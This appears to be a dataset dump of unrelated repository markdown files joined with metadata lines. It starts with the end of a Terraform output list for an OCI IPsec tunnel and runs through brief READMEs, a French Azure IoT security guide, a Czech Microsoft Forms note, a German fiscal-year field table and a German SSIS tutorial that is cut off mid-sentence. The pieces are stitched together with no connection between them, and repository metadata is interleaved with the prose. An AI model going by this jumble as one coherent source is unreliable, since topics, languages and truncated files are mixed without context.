oci_core_ipsec_connection_tunnel_management.this.display_name } output "id" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.id } output "ike_version" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.ike_version } output "shared_secret" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.shared_secret } output "state" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.state } output "status" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.status } output "time_created" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.time_created } output "time_status_updated" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.time_status_updated } output "vpn_ip" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.vpn_ip } output "this" { value = oci_core_ipsec_connection_tunnel_management.this } ``` [top](#index)
23.417625
89
0.682264
eng_Latn
0.757026
5398bb87e4048ea288710a0ee5ba2a8e6bdf0b97
35
md
Markdown
README.md
Mudimedia/github-api
835a8a348d315d6293d87bb2432f40eb847fb53d
[ "MIT" ]
1
2021-08-08T16:57:02.000Z
2021-08-08T16:57:02.000Z
README.md
Mudimedia/github-api
835a8a348d315d6293d87bb2432f40eb847fb53d
[ "MIT" ]
null
null
null
README.md
Mudimedia/github-api
835a8a348d315d6293d87bb2432f40eb847fb53d
[ "MIT" ]
null
null
null
# github-api Connect to Github API
11.666667
21
0.771429
eng_Latn
0.906219
539a0aecfcc9dbf04831948195d82b20de275133
344
md
Markdown
README.md
iiiypuk/gemini
ad25238fd5f0885463849d1789c2985abe4d67d9
[ "MIT" ]
1
2021-06-14T01:34:10.000Z
2021-06-14T01:34:10.000Z
README.md
iiiypuk/gemini
ad25238fd5f0885463849d1789c2985abe4d67d9
[ "MIT" ]
null
null
null
README.md
iiiypuk/gemini
ad25238fd5f0885463849d1789c2985abe4d67d9
[ "MIT" ]
null
null
null
## This repo deprecated New repo URL: https://iiiypuk.me/git/iiiypuk/Gemini ## Using Software * Server: [agate](https://github.com/mbrubeck/agate) * HTTP proxy: [kineto](https://git.sr.ht/~sircmpwn/kineto) * Client: [amfora](https://github.com/makeworld-the-better-one/amfora) * HTTP: [vulpes.one](https://proxy.vulpes.one/gemini/iiiypuk.me/)
38.222222
70
0.726744
yue_Hant
0.619628
539a0f18cde17b87d415e5ccaa025cbe8bb81f4a
723
md
Markdown
README.md
trustedhousesitters/docz-plugin-svg-sprite-loader
8a8c276bc15306b24f73855d32f8cd013f578ca0
[ "MIT" ]
2
2019-06-08T01:05:43.000Z
2020-04-29T07:29:07.000Z
README.md
trustedhousesitters/docz-plugin-svg-sprite-loader
8a8c276bc15306b24f73855d32f8cd013f578ca0
[ "MIT" ]
null
null
null
README.md
trustedhousesitters/docz-plugin-svg-sprite-loader
8a8c276bc15306b24f73855d32f8cd013f578ca0
[ "MIT" ]
null
null
null
# docz-plugin-svg-sprite-loader Allows you to use [svg-sprite-loader](https://github.com/kisenka/svg-sprite-loader) in your Docz config. This currently replaces all other svg loaders. ## Install ```bash $ yarn add docz-plugin-svg-sprite-loader ``` ## Usage ```js import { svgSpriteLoader } from 'docz-plugin-svg-sprite-loader'; export default { plugins: [svgSpriteLoader()], }; ``` ## Options Options can be passed into the function as the first argument. See [svg-sprite-loader](https://github.com/kisenka/svg-sprite-loader) for the fill list of options. ```js import { svgSpriteLoader } from 'docz-plugin-svg-sprite-loader'; export default { plugins: [svgSpriteLoader({ symbolId: 'icon-' })], }; ```
20.657143
162
0.710927
eng_Latn
0.388804
539a6f14a25f458c17f190c34733a6d9d3d16e6b
582
md
Markdown
wiki/translations/es/3D_input_devices.md
dwhr-pi/FreeCAD-documentation
0c889672d80e7969dcabe83f5ddf503e72a4f5bb
[ "CC0-1.0" ]
null
null
null
wiki/translations/es/3D_input_devices.md
dwhr-pi/FreeCAD-documentation
0c889672d80e7969dcabe83f5ddf503e72a4f5bb
[ "CC0-1.0" ]
null
null
null
wiki/translations/es/3D_input_devices.md
dwhr-pi/FreeCAD-documentation
0c889672d80e7969dcabe83f5ddf503e72a4f5bb
[ "CC0-1.0" ]
null
null
null
# 3D input devices/es FreeCAD soporta algunos dispositivos de entrada especializados, tales como ratones 3D. Estos permiten al usuario rotar, mover y hacer zoom a objetos en tres dimensiones. ## Hardware soportado <div class="mw-translate-fuzzy"> - 3Dconnexion [SpaceNavigator](http://www.3dconnexion.com/products/spacenavigator.html) - Instrucciones de instalación: [3Dconnexion](3Dconnexion_input_devices/es.md) </div> [category:Documentation](category_Documentation.md) --- ![](images/Right_arrow.png) [documentation index](../README.md) > 3D input devices/es
27.714286
169
0.766323
spa_Latn
0.477954
539a9000cad1aeac24d85672b91b9cdcd7340a6b
926
md
Markdown
sdk/docs/FiscalYears.md
freee/freee-accounting-sdk-java
2102cf9bf261683d3e81bca16b0aa6e14cef14b4
[ "MIT" ]
6
2019-10-11T06:52:07.000Z
2022-03-05T02:30:32.000Z
sdk/docs/FiscalYears.md
freee/freee-accounting-sdk-java
2102cf9bf261683d3e81bca16b0aa6e14cef14b4
[ "MIT" ]
7
2019-09-10T01:30:30.000Z
2021-10-21T01:18:13.000Z
sdk/docs/FiscalYears.md
freee/freee-accounting-sdk-java
2102cf9bf261683d3e81bca16b0aa6e14cef14b4
[ "MIT" ]
5
2019-10-11T06:56:10.000Z
2022-02-05T14:55:21.000Z
# FiscalYears ## Properties Name | Type | Description | Notes ------------ | ------------- | ------------- | ------------- **depreciationRecordMethod** | **Integer** | 月次償却(0: しない、1: する) | **endDate** | **String** | 期末日 | [optional] **indirectWriteOffMethod** | **Boolean** | 固定資産の控除法(true: 間接控除法、false: 直接控除法) | **returnCode** | **Integer** | 不動産所得使用区分(0: 一般、3: 一般/不動産) ※個人事業主のみ設定可能 | **salesTaxBusinessCode** | **Integer** | 簡易課税用事業区分(0: 第一種:卸売業、1: 第二種:小売業、2: 第三種:農林水産業、工業、建設業、製造業など、3: 第四種:飲食店業など、4: 第五種:金融・保険業、運輸通信業、サービス業など、5: 第六種:不動産業など | **startDate** | **String** | 期首日 | [optional] **taxAccountMethod** | **Integer** | 消費税経理処理方法(0: 税込経理、1: 旧税抜経理、2: 税抜経理) | **taxFraction** | **Integer** | 消費税端数処理方法(0: 切り捨て、1: 切り上げ、2: 四捨五入) | **taxMethod** | **Integer** | 課税区分(0: 免税、1: 簡易課税、2: 本則課税(個別対応方式)、3: 本則課税(一括比例配分方式)、4: 本則課税(全額控除)) | **useIndustryTemplate** | **Boolean** | 製造業向け機能(true: 使用する、false: 使用しない) |
40.26087
157
0.595032
yue_Hant
0.902983
539a9e2cdcbece174ad708f6b9a9da136b4060eb
2,838
md
Markdown
core/changelog.md
bewillcott/bewsoftware-mdj
c651e302f2e7ac9175952f8db419abaa7b9242fa
[ "BSD-3-Clause" ]
1
2020-01-29T08:15:58.000Z
2020-01-29T08:15:58.000Z
core/changelog.md
bewillcott/bewsoftware-mdj
c651e302f2e7ac9175952f8db419abaa7b9242fa
[ "BSD-3-Clause" ]
null
null
null
core/changelog.md
bewillcott/bewsoftware-mdj
c651e302f2e7ac9175952f8db419abaa7b9242fa
[ "BSD-3-Clause" ]
null
null
null
# Change Log - Markdownj-Core ## What's New This version is a fork of the [main]! project. I don't know if it will be integrated back into that project, or continue as a separate one. ## Version: 0.5.x Snapshot ### Code review All the code was reviewed and updated to latest Java features. - Where useful, anonymous classes were converted to the Lambda format. - To help with clarity, I also ran the Netbeans: Source->Organize Members menu option. - Cleaned up some code that was either unnecessary, or could be redone in a less verbose manner. ### Extended markdown capability #### Fenced Code Blocks Start line with "~~~" or "\`\`\`". The fencing requires that the block ends with the same sequence as it starts with. Wraps the text between the fences in: ``` <pre> <code> The text </code> </pre> ``` #### Tables ~~~ This would be the table's caption | Col1 Header | Col2 Header |Col3 Header|Col 4 |[] | :---- | -:- | ---: | :---: |[#Id][] | Left | Center |Right |Justified|[] | Row 2 | More text | | | ~~~ This would be the table's caption | Col1 Header | Col2 Header |Col3 Header|Col 4 |[] | :---- | -:- | ---: | :---: |[#Id][] | Left | Center |Right |Justified|[] | Row 2 | More text | | | A Table begins and ends with a blank line. If present, the first row above the table becomes the table's "caption". If the _caption_ text is bracketed thus: `[This would be the table's caption]`, then it would be given the same borders as are set for the `<table>` element. See table below [&darr;](#Id2) Each line begins and ends with a pipe character '|', with additional such to separate columns. Each line can have an optional __[]__ bracketed parameter or two. If just one is provided, then when empty `[]`, adds a border around that row. If it contains text, the text is inserted into a 'class=' attribute for that row. Special cases: - The delimiter row (contains the `-` and `:` characters) sets the parameters for the `<table>` tag. - Data rows: - If just the first one is set with a bracketed parameter, then this will be used for all data rows. - Subsequent rows can be set to either the same class(es) as the first row or to different class(es). - Any following rows not set, will be configured using the row sequencing of the first set of rows, in rotation. [This would be the table's caption] | Col1 Header | Col2 Header |Col3 Header|Col 4 |[] | :---- | -:- | ---: | :---: |[#Id2][] | Left | Center |Right |Justified|[] | Row 2 | More text | | | ### Further Reading You can find a lot more information in the manual. [main]:https://github.com/myabc/markdownj
32.25
100
0.628259
eng_Latn
0.99828
539b72d680b0b3aef5921aba2dcd9ab8f70d8543
61
md
Markdown
README.md
NeuroLang/vwfa_language_attention
e82c6f08c313b4d3c18b231e19ed6d9f45bc2d94
[ "BSD-3-Clause" ]
null
null
null
README.md
NeuroLang/vwfa_language_attention
e82c6f08c313b4d3c18b231e19ed6d9f45bc2d94
[ "BSD-3-Clause" ]
null
null
null
README.md
NeuroLang/vwfa_language_attention
e82c6f08c313b4d3c18b231e19ed6d9f45bc2d94
[ "BSD-3-Clause" ]
null
null
null
# vwfa_language_attention Code corresponding to the article
20.333333
34
0.852459
eng_Latn
0.979353
539bb82384c6b6d485e63a45f944090f8c05f7e5
15,368
md
Markdown
includes/iot-secure-your-deployment.md
OpenLocalizationTestOrg/azure-docs-pr15_fr-BE
753623e5195c97bb016b3a1f579431af9672c200
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
includes/iot-secure-your-deployment.md
OpenLocalizationTestOrg/azure-docs-pr15_fr-BE
753623e5195c97bb016b3a1f579431af9672c200
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
includes/iot-secure-your-deployment.md
OpenLocalizationTestOrg/azure-docs-pr15_fr-BE
753623e5195c97bb016b3a1f579431af9672c200
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
# <a name="securing-your-iot-deployment"></a>Sécurisation de votre déploiement IoT Cet article fournit le niveau suivant de détails pour la sécurisation de l’infrastructure de l’Internet des objets basés sur Azure IoT (IoT). Il lie aux détails d’implémentation au niveau de la configuration et le déploiement de chaque composant. Il fournit également les comparaisons et le choix entre différentes méthodes de concurrents. Sécurisation du déploiement d’Azure IoT peut être divisé en zones de trois sécurité suivantes : - **Dispositif de sécurité**: sécurisation du périphérique IoT pendant qu’il est déployé dans la nature. - **Sécurité de la connexion**: toutes les données transmises entre le IoT périphérique et IoT concentrateur est confidentielle et inviolable. - **Sécurité du nuage**: fournir un moyen pour sécuriser les données pendant qu’il parcourt et est stocké dans le nuage. ![Trois zones de sécurité][img-overview] ## <a name="secure-device-provisioning-and-authentication"></a>Mise en service du dispositif de sécurité et authentification La Suite de IoT Azure sécurise les périphériques IoT par le des deux méthodes suivantes : - En fournissant une clé d’identité unique (jetons de sécurité) pour chaque périphérique, ce qui peut être utilisé par le périphérique pour communiquer avec le IoT Hub. - À l’aide d’un [certificat X.509] sur périphérique[ lnk-x509] et la clé privée comme un moyen d’authentifier le périphérique sur le concentrateur IoT. Cette méthode d’authentification permet de s’assurer que la clé privée sur le périphérique ne connaît pas à l’extérieur de l’appareil à tout moment, fournissant un niveau de sécurité supérieur. La méthode de jeton de sécurité fournit une authentification pour chaque appel effectué par le périphérique pour le concentrateur de IoT en associant la clé symétrique à chaque appel. Authentification basée sur les X.509 permet l’authentification d’un dispositif IoT au niveau de la couche physique dans le cadre de l’établissement de la connexion TLS. La méthode basée sur des jetons de sécurité peut être utilisée sans l’authentification X.509, qui est un modèle moins sécurisé. Le choix entre les deux méthodes dépend principalement la sécurisation du périphérique d’authentification doit être et la disponibilité de stockage sécurisé sur le périphérique (pour stocker la clé privée en toute sécurité). ## <a name="iot-hub-security-tokens"></a>Jetons de sécurité IoT concentrateur IoT Hub utilise les jetons de sécurité pour authentifier les périphériques et les services afin d’éviter l’envoi de clés sur le réseau. En outre, les jetons de sécurité sont limités dans la portée et de la période de validité. Azure SDK de concentrateur IoT générer automatiquement des jetons sans configuration spéciale. Certains scénarios, toutefois, exigent de l’utilisateur de générer et d’utiliser directement les jetons de sécurité. Il s’agit notamment de l’utilisation directe des surfaces MQTT, AMQP ou HTTP, ou la mise en oeuvre du modèle service de jeton. Vous trouverez plus de détails sur la structure du jeton de sécurité et de son utilisation dans les articles suivants : - [Structure de jeton de sécurité][lnk-security-tokens] - [À l’aide des jetons d’associations de sécurité en tant que périphérique][lnk-sas-tokens] Chaque concentrateur IoT a un [Registre d’identité de périphérique] [ lnk-identity-registry] qui peut être utilisé pour créer des ressources de périphérique dans le service, comme une file d’attente contient les messages du nuage vers le périphérique en vol et pour permettre l’accès aux points de terminaison orientés vers le périphérique. Le Registre d’identité IoT Hub offre un stockage sécurisé des identités des appareils et des clés de sécurité pour une solution. Individu ou des groupes d’identités de périphérique peuvent être ajoutés à une liste ou une liste d’interdiction, permettant le contrôle total sur l’accès au périphérique. Les articles suivants fournissent des informations supplémentaires sur la structure du Registre d’identité de périphérique et prise en charge des opérations. [Concentrateur de IoT prend en charge les protocoles tels que HTTP, AMQP et MQTT][lnk-protocols]. Chacun de ces protocoles utilisent des jetons de sécurité à partir du périphérique IoT IoT concentrateur différemment : - AMQP : La sécurité SASL simple et basée sur les revendications de AMQP ({policyName}@sas.root.{iothubName} pour les jetons d’au niveau du concentrateur ; {deviceId} en cas de jetons de dispositif de portée). - MQTT : Connecter des utilisations de paquet {deviceId} comme {ClientId}, {IoThubhostname} / {ID de périphérique} dans le champ **nom d’utilisateur** et un jeton SAS dans le champ **mot de passe** . - HTTP : Jeton valide est dans l’en-tête de la demande d’autorisation. Registre d’identité IoT concentrateur périphérique peut servir à configurer les informations d’identification de sécurité de périphérique et de contrôle d’accès. Toutefois, si une solution IoT a déjà consenti un investissement significatif dans un [mécanisme du Registre et d’authentification d’identité périphérique personnalisé][lnk-custom-auth], il peut être intégré dans une infrastructure existante avec IoT Hub en créant un service de jetons. ### <a name="x509-certificate-based-device-authentication"></a>Authentification du périphérique basé sur un certificat X.509 L’utilisation d’un [certificat X.509 périphérique] [ lnk-use-x509] et sa paire de clés publique et privée associée permet une authentification supplémentaire au niveau de la couche physique. La clé privée est stockée en toute sécurité dans le périphérique et n’est pas détectable à l’extérieur de l’appareil. Le certificat X.509 contient des informations sur le périphérique, telles que des ID de périphérique et d’autres détails d’organisation. Une signature de certificat est générée à l’aide de la clé privée. Flux de provisionnement de dispositif de haut niveau : - Associer un identificateur à un périphérique physique – l’identité du périphérique et/ou de certificat X.509 associé au périphérique lors de la fabrication ou la mise en service de périphérique. - Créer une entrée d’identité correspondante dans IoT concentrateur – identité de périphérique et les informations de périphérique associé dans le Registre de périphérique du concentrateur IoT. - Stocker en toute sécurité l’empreinte de certificat X.509 dans le Registre de périphérique IoT concentrateur. ### <a name="root-certificate-on-device"></a>Certificat racine sur le périphérique Lors de l’établissement d’une connexion TLS sécurisée avec IoT concentrateur, le périphérique IoT authentifie concentrateur IoT à l’aide d’un certificat racine qui fait partie du Kit de développement logiciel de périphérique. Pour le Kit de développement logiciel du client C le certificat se trouve dans le dossier «\\c\\certificats » sous la racine de la mis en pension. Bien que ces certificats racines sont durables, ils toujours peuvent expirer ou être révoqués. S’il n’existe aucun moyen de mise à jour du certificat sur le périphérique, le périphérique n’est peut-être pas capable de se connecter par la suite le concentrateur IoT (ou tout autre service de cloud). Avoir un moyen de mettre à jour le certificat racine, une fois le périphérique IoT déployé réduire de manière efficace ce risque. ## <a name="securing-the-connection"></a>Sécurisation de la connexion Connexion Internet entre le dispositif de IoT et IoT concentrateur est sécurisée à l’aide de la norme de sécurité TLS (Transport Layer). IoT Azure prend en charge [TLS 1.2][lnk-tls12], TLS 1.1 et TLS 1.0, dans cet ordre. Prise en charge de TLS 1.0 est fournie pour la compatibilité ascendante. Il est recommandé d’utiliser TLS 1.2 dans la mesure où il fournit le plus de sécurité. Azure IoT Suite prend en charge les Suites de chiffrement suivants, dans cet ordre. | Suite de chiffrement | Longueur | |--------------|--------| | TLS\_ECDHE\_RSA\_WITH\_AES\_256\_CBC\_SHA384 secp384r1 ECDH (0xc028) (ég. 7680 bits RSA) FS | 256 | | TLS\_ECDHE\_RSA\_WITH\_AES\_128\_CBC\_SHA256 secp256r1 ECDH (0xc027) (ég. FS de 3072 bits RSA) | 128 | | TLS\_ECDHE\_RSA\_WITH\_AES\_256\_CBC\_SHA (0xc014) secp384r1 ECDH (ég. 7680 bits RSA) FS | 256 | | TLS\_ECDHE\_RSA\_WITH\_AES\_128\_CBC\_SHA (0xc013) secp256r1 ECDH (ég. FS de 3072 bits RSA) | 128 | | TLS\_RSA\_WITH\_AES\_256\_GCM\_SHA384 (0x9d) | 256 | | TLS\_RSA\_WITH\_AES\_128\_GCM\_SHA256 (0x9C.) | 128 | | TLS\_RSA\_WITH\_AES\_256\_CBC\_SHA256 (0x3d) | 256 | | TLS\_RSA\_WITH\_AES\_128\_CBC\_SHA256 (0x3c) | 128 | | TLS\_RSA\_WITH\_AES\_256\_CBC\_SHA (0x35) | 256 | | TLS\_RSA\_WITH\_AES\_128\_CBC\_SHA (0x2f) | 128 | | TLS\_RSA\_WITH\_3DES\_EDE\_CBC\_SHA (0xa) | 112 | ## <a name="securing-the-cloud"></a>Sécurisation du cloud Concentrateur de IoT Azure permet la définition des [stratégies de contrôle d’accès] [ lnk-protocols] pour chaque clé de sécurité. Il utilise l’ensemble des autorisations suivantes pour accorder l’accès à chacun des points de terminaison du concentrateur IoT. Autorisations de limitent l’accès à un concentrateur IoT basé sur la fonctionnalité. - **RegistryRead**. Accorde l’accès en lecture à l’identité de périphérique du Registre. Pour plus d’informations, consultez le [Registre d’identité de périphérique][lnk-identity-registry]. - **RegistryReadWrite**. Lire des subventions et l’accès en écriture sur le Registre d’identité de périphérique. Pour plus d’informations, consultez le [Registre d’identité de périphérique][lnk-identity-registry]. - **ServiceConnect**. Accorde l’accès à la communication et surveillance des points de terminaison orientés vers le service en nuage. Par exemple, il accorde l’autorisation pour les services en nuage de back-end pour recevoir des messages de périphérique-nuage, envoyer des messages du nuage vers le périphérique et récupérer les accusés de réception de livraison correspondante. - **DeviceConnect**. Accorde l’accès aux points de terminaison de communication orientés vers le périphérique. Par exemple, il accorde l’autorisation d’envoyer des messages de périphérique-nuage et de recevoir des messages de nuage vers le périphérique. Cette autorisation est utilisée par les périphériques. Il existe deux méthodes pour obtenir les autorisations de **DeviceConnect** avec IoT Hub avec des [jetons de sécurité][lnk-sas-tokens]: à l’aide d’une clé d’identité de périphérique ou une clé de stratégie d’accès partagé. En outre, il est important de noter que toutes les fonctionnalités accessibles à partir de périphériques sont exposée par la conception de points de terminaison avec le préfixe `/devices/{deviceId}`. [Composants de service ne peuvent générer que des jetons de sécurité] [ lnk-service-tokens] à l’aide de partage des stratégies d’accès accorder les autorisations appropriées. Concentrateur de IoT Azure et d’autres services qui peuvent faire partie de la solution permettent la gestion des utilisateurs à l’aide d’Active Directory Azure. Données ingérées par Azure IoT concentrateur peuvent être consommées par une variété de services tels que Azure flux Analytique et stockage blob Azure. Ces services permettent l’accès à l’administration. Découvrez ces services et les options disponibles ci-dessous : - [Azure DocumentDB][lnk-docdb]: un service de base de données évolutive et entièrement indexés pour fournir des données semi-structurées qui gère les métadonnées pour les périphériques vous mettre en service, telles que les attributs, la configuration et les propriétés de sécurité. DocumentDB offre un traitement hautes performances et haut débit, indépendant du schéma d’indexation des données et une interface de requête SQL riche. - [Analytique de flux Azure][lnk-asa]: dans le cloud qui vous permet de rapidement développer et déployer une solution économique analytique pour découvrir des informations en temps réel à partir de périphériques, les capteurs, l’infrastructure et les applications de traitement de flux en temps réel. Les données de ce service entièrement géré peuvent s’adapter à n’importe quel volume tout en atteignant la résilience, une faible latence et un débit élevé. - [Les Services d’application Azure][lnk-appservices]: une plate-forme de nuage pour construire des web puissante et des applications mobiles qui se connectent à des données de n’importe où. dans le nuage ou de locaux. Générer l’engagement des applications mobiles pour iOS, Android et Windows. Intégration avec le logiciel en tant que Service (SaaS) et des applications d’entreprise avec l’emploi d’une connectivité à des dizaines de services en nuage et les applications d’entreprise. Le code dans votre langage préféré et l’IDE (.NET, NodeJS, PHP, Python ou Java) pour générer des applications web et des API plus rapidement que jamais. - [Logique d’applications][lnk-logicapps]: fonctionnalité de l’applications de logique de Service d’application Azure permet d’intégrer votre solution IoT à vos systèmes existants de secteur d’activité et d’automatiser les processus de flux de travail. Logique d’applications permet aux développeurs de concevoir des workflows avec démarrer à partir d’un déclencheur et exécuter une série d’étapes, les règles et les actions qui utilisent des connecteurs puissants pour s’intégrer à vos processus d’entreprise. Logique d’applications offre une connectivité de-l’emploi pour une vaste écosystème de SaaS, basée sur le nuage et des applications sur site. - [Stockage des objets blob Azure][lnk-blob]: stockage en nuage fiable et économique pour les données que vos périphériques envoyer vers le nuage. ## <a name="conclusion"></a>Conclusion Cet article fournit des détails du niveau pour la conception et le déploiement d’une infrastructure IoT à l’aide d’Azure IoT vue d’ensemble de la mise en oeuvre. Configuration de chaque composant pour être sécurisé est la clé dans la sécurisation de l’infrastructure globale de IoT. Les choix de conception disponibles dans Azure IoT fournissent un certain niveau de souplesse et de choix ; Cependant, chaque choix peuvent avoir des conséquences sur la sécurité. Il est recommandé que chacun de ces choix évaluée par une évaluation des risques/coût. [img-overview]: media/iot-secure-your-deployment/overview.png [lnk-security-tokens]: ../articles/iot-hub/iot-hub-devguide-security.md#security-token-structure [lnk-sas-tokens]: ../articles/iot-hub/iot-hub-devguide-security.md#use-sas-tokens-as-a-device [lnk-identity-registry]: ../articles/iot-hub/iot-hub-devguide-identity-registry.md [lnk-protocols]: ../articles/iot-hub/iot-hub-devguide-security.md [lnk-custom-auth]: ../articles/iot-hub/iot-hub-devguide-security.md#custom-device-authentication [lnk-x509]: http://www.itu.int/rec/T-REC-X.509-201210-I/en [lnk-use-x509]: ../articles/iot-hub/iot-hub-devguide-security.md [lnk-tls12]: https://tools.ietf.org/html/rfc5246 [lnk-service-tokens]: ../articles/iot-hub/iot-hub-devguide-security.md#using-security-tokens-from-service-components [lnk-docdb]: https://azure.microsoft.com/services/documentdb/ [lnk-asa]: https://azure.microsoft.com/services/stream-analytics/ [lnk-appservices]: https://azure.microsoft.com/services/app-service/ [lnk-logicapps]: https://azure.microsoft.com/services/app-service/logic/ [lnk-blob]: https://azure.microsoft.com/services/storage/
118.215385
801
0.793857
fra_Latn
0.984408
539bfd337dbf5d73beb4f42c80592211491c0825
889
md
Markdown
content/generators/fullscreen-map/1/schema.md
opendatasoft/codelibrary
0a68633c23ab61fdff53aed9b4e6f99a6933f34e
[ "MIT" ]
null
null
null
content/generators/fullscreen-map/1/schema.md
opendatasoft/codelibrary
0a68633c23ab61fdff53aed9b4e6f99a6933f34e
[ "MIT" ]
15
2021-02-02T17:30:57.000Z
2022-01-07T15:26:09.000Z
content/generators/fullscreen-map/1/schema.md
opendatasoft/codelibrary
0a68633c23ab61fdff53aed9b4e6f99a6933f34e
[ "MIT" ]
4
2021-02-25T12:54:49.000Z
2021-09-01T03:46:22.000Z
**Dataset in use:** `fr-esr-principaux-etablissements-enseignement-superieur` [(See it on mesr domain)](https://mesr.opendatasoft.com/explore/dataset/fr-esr-principaux-etablissements-enseignement-superieur/table/) **Fields in use:** |type_d_etablissement|secteur_d_etablissement|dep_nom|uo_lib|adresse_uai|dep_nom|numero_telephone_uai|url| |---|---|---|---|---|---|---|---| |Grand établissement|Public|Paris|Conservatoire national des arts et métiers|292 RUE SAINT MARTIN|Paris|0140272000|http://www.cnam.fr/| |École|Public|Bouches-du-Rhône|Centrale Marseille|38 rue Frédéric-Joliot-Curie|Bouches-du-Rhône|0491282898|https://www.centrale-marseille.fr/| |École|Privé|Paris|École centrale d'électronique|37 quai de Grenelle|Paris|0144390600|https://www.ece.fr/ecole-ingenieur/| |École|Privé|Haute-Garonne|École d'ingénieurs de Purpan|75 VOIE DU TOEC|Haute-Garonne||http://www.purpan.fr/|
74.083333
213
0.778403
yue_Hant
0.112395
539c24fed3ee6bca3b218baed4393c0612fc2d0d
1,007
md
Markdown
AlchemyInsights/transfer-form-ownership-to-another-user.md
pebaum/OfficeDocs-AlchemyInsights-pr.cs-CZ
3c55a84664ad4f0f0ef39dced9e6ca253b21ba71
[ "CC-BY-4.0", "MIT" ]
null
null
null
AlchemyInsights/transfer-form-ownership-to-another-user.md
pebaum/OfficeDocs-AlchemyInsights-pr.cs-CZ
3c55a84664ad4f0f0ef39dced9e6ca253b21ba71
[ "CC-BY-4.0", "MIT" ]
null
null
null
AlchemyInsights/transfer-form-ownership-to-another-user.md
pebaum/OfficeDocs-AlchemyInsights-pr.cs-CZ
3c55a84664ad4f0f0ef39dced9e6ca253b21ba71
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Formulář vlastnictví na jiného uživatele ms.author: pebaum author: pebaum manager: mnirkhe ms.audience: Admin ms.topic: article ROBOTS: NOINDEX, NOFOLLOW localization_priority: Normal ms.collection: Adm_O365 ms.custom: - "2548" - "9000672" ms.openlocfilehash: 6c975955b596a0c8ab2693aa73074ad7c86913e0 ms.sourcegitcommit: 1d98db8acb9959aba3b5e308a567ade6b62da56c ms.translationtype: MT ms.contentlocale: cs-CZ ms.lasthandoff: 08/22/2019 ms.locfileid: "36507192" --- # <a name="transfer-ownership-of-a-microsoft-form"></a>Převod vlastnictví formuláře aplikace Microsoft Můžete přesunout průzkumu, kvíz nebo hlasování v Microsoft Forms ke skupině tak, aby všichni uživatelé ve vaší skupině stává vlastníky tohoto formuláře. Vlastnictví formuláře lze také převést na jiného uživatele, pokud předchozí vlastník opustil organizaci. Další informace naleznete v tématu [Převod vlastnictví formuláře](https://support.office.com/article/Transfer-ownership-of-a-form-921a6361-a4e5-44ea-bce9-c4ed63aa54b4).
40.28
257
0.823237
ces_Latn
0.996528
539c9698dc9ec547acde0713ac7957c689920bb2
3,783
md
Markdown
docs/integration-services/lesson-5-add-ssis-package-configurations-for-the-package-deployment-model.md
SteSinger/sql-docs.de-de
2259e4fbe807649f6ad0d49b425f1f3fe134025d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/integration-services/lesson-5-add-ssis-package-configurations-for-the-package-deployment-model.md
SteSinger/sql-docs.de-de
2259e4fbe807649f6ad0d49b425f1f3fe134025d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/integration-services/lesson-5-add-ssis-package-configurations-for-the-package-deployment-model.md
SteSinger/sql-docs.de-de
2259e4fbe807649f6ad0d49b425f1f3fe134025d
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 'Lektion 5: Hinzufügen von SSIS-Paketkonfigurationen für das Paketbereitstellungsmodell | Microsoft-Dokumentation' ms.custom: '' ms.date: 01/08/2019 ms.prod: sql ms.prod_service: integration-services ms.reviewer: '' ms.technology: integration-services ms.topic: tutorial ms.assetid: 1c10dd54-67cb-4b63-9e4d-aa6ff0452ecb author: chugugrace ms.author: chugu ms.openlocfilehash: d3b3ccea56d367e7870826b39830e415e26bb2ac ms.sourcegitcommit: e8af8cfc0bb51f62a4f0fa794c784f1aed006c71 ms.translationtype: HT ms.contentlocale: de-DE ms.lasthandoff: 09/26/2019 ms.locfileid: "71295911" --- # <a name="lesson-5-add-ssis-package-configurations-for-the-package-deployment-model"></a>Lektion 5: Hinzufügen von SSIS-Paketkonfigurationen für das Paketbereitstellungsmodell [!INCLUDE[ssis-appliesto](../includes/ssis-appliesto-ssvrpluslinux-asdb-asdw-xxx.md)] Mithilfe von Paketkonfigurationen können Sie Laufzeiteigenschaften und -variablen von außerhalb der Entwicklungsumgebung festlegen. Mithilfe von Konfigurationen können Sie Pakete entwickeln, die flexibel und einfach bereitzustellen sowie zu verteilen sind. [!INCLUDE[msCoName](../includes/msconame-md.md)] [!INCLUDE[ssISnoversion](../includes/ssisnoversion-md.md)] stellt die folgenden Konfigurationstypen bereit: - XML-Konfigurationsdatei - Umgebungsvariable - Registrierungseintrag - Variable für das übergeordnete Paket - [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)]-Tabelle In dieser Lektion ändern Sie das [!INCLUDE[ssISnoversion](../includes/ssisnoversion-md.md)]-Beispielpaket, das Sie in [Lektion 4: Hinzufügen der Fehlerflussumleitung mit SSIS](../integration-services/lesson-4-add-error-flow-redirection-with-ssis.md) erstellt haben, um das Paketbereitstellungsmodell und die Paketkonfigurationen nutzen zu können. Sie können auch das abgeschlossene Paket aus Lektion 4 kopieren, das in diesem Tutorial enthalten ist. Mithilfe des Paketkonfigurations-Assistenten erstellen Sie eine XML-Konfiguration, von der die **Directory**-Eigenschaft des Foreach-Schleifencontainers mithilfe einer Variablen auf Paketebene aktualisiert wird. Sie verwenden eine Variable auf Paketebene, die der **Directory**-Eigenschaft zugeordnet ist. Nach dem Erstellen der Konfigurationsdatei ändern Sie den Wert der Variablen von außerhalb der Entwicklungsumgebung in einen neuen Beispieldatenordnerpfad. Wenn Sie das Paket erneut ausführen, wird der Wert der Variablen von der Konfigurationsdatei aufgefüllt, und von der Variablen wird im Gegenzug die **Directory** -Eigenschaft aktualisiert. Das Paket durchläuft dann die Dateien im neuen Datenordner und nicht im ursprünglichen hartcodierten Ordner. > [!NOTE] > Machen Sie sich, falls noch nicht geschehen, mit den 